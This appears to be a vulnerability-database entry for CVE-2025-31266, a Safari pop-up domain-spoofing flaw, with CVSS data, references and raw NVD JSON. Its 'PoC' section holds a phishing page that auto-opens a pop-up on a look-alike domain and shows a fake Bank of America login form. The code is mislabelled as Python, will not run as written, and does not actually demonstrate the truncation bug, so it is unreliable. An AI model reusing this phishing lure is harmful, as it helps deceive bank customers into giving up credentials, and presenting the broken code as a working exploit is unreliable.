CVE-2025-31266

Description

A spoofing issue was addressed with improved truncation when displaying the fully qualified domain name. This issue is fixed in Safari 18.5, macOS Sequoia 15.5. A website may be able to spoof the domain name in the title of a pop-up window.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

Safari < 18.5

macOS Sequoia < 15.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-31266 PoC - Domain Name Spoofing via Popup Window
// This PoC demonstrates how an attacker can spoof domain names in popup window titles

// Attacker's controlled domain that will appear legitimate after truncation
const ATTACKER_DOMAIN = 'legitimate-bank.' + 'a'.repeat(100) + '.malicious.com';

// Create a malicious page that displays a spoofed popup
const maliciousPage = `
<!DOCTYPE html>
<html>
<head>
    <title>Secure Banking Portal</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; }
        .spoofed-popup { 
            border: 2px solid #0066cc; 
            padding: 20px; 
            background: #f0f8ff;
            max-width: 400px;
        }
    </style>
</head>
<body>
    <h2>Security Alert</h2>
    <div class="spoofed-popup">
        <p>Your session has expired. Please re-authenticate.</p>
        <button onclick="openSpoofedWindow()">Continue to Login</button>
    </div>

    <script>
        function openSpoofedWindow() {
            // Open window with attacker-controlled domain
            // The truncation in Safari may show only the legitimate-looking part
            const fakeWindow = window.open(
                'https://' + '${ATTACKER_DOMAIN}',
                'Login Window',
                'width=500,height=400,menubar=no,toolbar=no'
            );
            
            // Inject content into the popup to appear as legitimate bank
            if (fakeWindow) {
                fakeWindow.document.write('
                    <html>
                    <head><title>Secure Login - Bank of America</title></head>
                    <body style="font-family:Arial;text-align:center;padding:50px;">
                        <h2>Bank of America - Sign In</h2>
                        <form>
                            <input type="text" placeholder="User ID" style="padding:10px;margin:10px;"><br>
                            <input type="password" placeholder="Password" style="padding:10px;margin:10px;"><br>
                            <button type="submit" style="padding:10px 20px;">Sign In</button>
                        </form>
                    </body>
                    </html>
                ');
            }
        }
        
        // Auto-trigger on page load for demonstration
        // In real attack, this would be triggered via social engineering
        window.onload = function() {
            setTimeout(openSpoofedWindow, 1000);
        };
    </script>
</body>
</html>
`;

console.log('CVE-2025-31266 Domain Spoofing PoC');
console.log('Target: Safari < 18.5, macOS Sequoia < 15.5');
console.log('Attack Vector: Manipulate FQDN truncation for visual spoofing');
console.log('\nTo test this vulnerability:');
console.log('1. Host this page on a web server');
console.log('2. Access it via vulnerable Safari version');
console.log('3. Observe the spoofed domain in popup title');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-31266
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-31266
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-31266/
[4] VulDB https://vuldb.com/cve/CVE-2025-31266
[5] https://support.apple.com/en-us/122716
[6] https://support.apple.com/en-us/122719

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-31266", "sourceIdentifier": "[email protected]", "published": "2025-11-21T22:16:19.743", "lastModified": "2026-04-02T19:19:58.183", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A spoofing issue was addressed with improved truncation when displaying the fully qualified domain name. This issue is fixed in Safari 18.5, macOS Sequoia 15.5. A website may be able to spoof the domain name in the title of a pop-up window."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.5", "matchCriteriaId": "2911F28D-586D-4C43-BCE7-A8A77568E183"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.5", "matchCriteriaId": "EF1B4AB8-2B51-4EED-BD29-C500C83FAB10"}]}]}], "references": [{"url": "https://support.apple.com/en-us/122716", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/122719", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}